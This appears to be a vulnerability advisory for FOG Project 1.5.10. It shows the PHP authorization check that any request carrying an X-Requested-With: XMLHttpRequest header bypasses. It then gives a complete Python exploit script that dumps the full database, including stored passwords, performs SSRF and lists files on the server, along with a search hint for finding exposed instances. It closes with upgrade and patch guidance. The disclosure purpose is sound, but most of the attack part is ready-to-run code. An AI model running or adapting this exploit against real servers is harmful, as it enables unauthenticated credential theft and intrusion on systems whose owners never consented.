authentication bypass vulnerability leads to unauthenticated DB dump, attacker could be able to dump full SQL DB dump without any authentication at all.
public static function is_authorized($return_bool = false)
{
$authorized = (self::$FOGUser && self::$FOGUser->isValid()) ||
strtolower(($_SERVER['HTTP_X_REQUESTED_WITH'] ?? '')) == 'xmlhttprequest';
if ($return_bool) {
return $authorized;
}
if (!$authorized) {
echo _('Unauthorized');
exit;
}
}
import requests
import argparse
import sys
from urllib.parse import quote
# FOFA search icon_hash="-1952619005"
def print_cred():
print("[*] Fog project exploit by casp3r0x0 hassan al-khafaji")
print("[*] GitHub: https://github.com/casp3r0x0")
def EXPDump(target):
# Implementation for exploit dump functionality
print(f"[+] Target: {target}")
print("[+] Dumping...")
burp0_url = f"{target}/fog/management/export.php?filename=HistoryReport&type=pdf"
burp0_cookies = {"PHPSESSID": ""}
burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0_data = {"fogguiuser": '', "fogguipass": '', "nojson": "4", "export": "3"}
x = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
x.raise_for_status()
with open("output.txt", "w", encoding="utf-8") as f:
f.write(x.text)
print("[+] Dumped saved to output.txt")
def SSRF(target, url):
# Implementation for SSRF functionality
print(f"[+] Target: {target}")
print(f"[+] SSRF URL: {url}")
burp0_url = f"{target}/fog/service/getversion.php?url={quote(url)}"
burp0_cookies = {"PHPSESSID": ""}
burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False)
res.raise_for_status()
print("[+] SSRF request sent")
def listfiles(target, path):
# Implementation for list files functionality
print(f"[+] Target: {target}")
print(f"[+] Path: {path}")
burp0_url = f"{target}/fog/status/getfiles.php?path={path}"
burp0_cookies = {"PHPSESSID": ""}
burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False)
res.raise_for_status()
print("[+] List files request sent")
print(res.text)
def main():
parser = argparse.ArgumentParser(description="Exploit tool for FOGProject system by Casp3r0x0 Hassan Ali Al-khafaji")
parser.add_argument("-t", "--target", required=True, help="Target URL (mandatory)")
parser.add_argument("--dump", action="store_true", help="dump full db from the target")
parser.add_argument("--SSRF", metavar="URL", help="Execute SSRF function with specified URL")
parser.add_argument("--listfiles", metavar="PATH", help="Execute listfiles function with specified path")
args = parser.parse_args()
# Check if at least one action is specified
if not any([args.dump, args.SSRF, args.listfiles]):
print("Error: At least one action must be specified (--dump, --SSRF, or --listfiles)")
parser.print_help()
sys.exit(1)
target = args.target
if args.dump:
print_cred()
EXPDump(target)
if args.SSRF:
print_cred()
SSRF(target, args.SSRF)
if args.listfiles:
print_cred()
listfiles(target, args.listfiles)
if __name__ == "__main__":
main()
the DB dump contains the hashed passwords and clear text passwords for FTPs etc ...
Upgrading to the latest version of dev-branch or working-1.6 right now will patch this for those concerned about immediate exposure (see https://docs.fogproject.org/en/latest/install-fog-server#choosing-a-fog-version for instructions on upgrading to a different branch).
These changes will be released to stable in the next automated release on 9/15/2025.
casp3r0x0 Reporter
Summary
authentication bypass vulnerability leads to unauthenticated DB dump, attacker could be able to dump full SQL DB dump without any authentication at all.
Details
the main issue is located at the following code :
/var/www/fog/lib/fog/fogbase.class.phpthis function is return true if the http request contains
X-Requested-With: XMLHttpRequestwhich leads to authentication bypassPoC
below a script that will exploit the vulnerability and can do the following :
Dump Full MysqlDB
exploit SSRF vulnerability
list files on the server
the DB dump contains the hashed passwords and clear text passwords for FTPs etc ...
SSRF which can be considered as another vuln:
list files which can be considered as another vuln :
Impact
latest version of fog project is vulnerable 1.5.10.1673
Resolution
Upgrading to the latest version of dev-branch or working-1.6 right now will patch this for those concerned about immediate exposure (see https://docs.fogproject.org/en/latest/install-fog-server#choosing-a-fog-version for instructions on upgrading to a different branch).
These changes will be released to stable in the next automated release on 9/15/2025.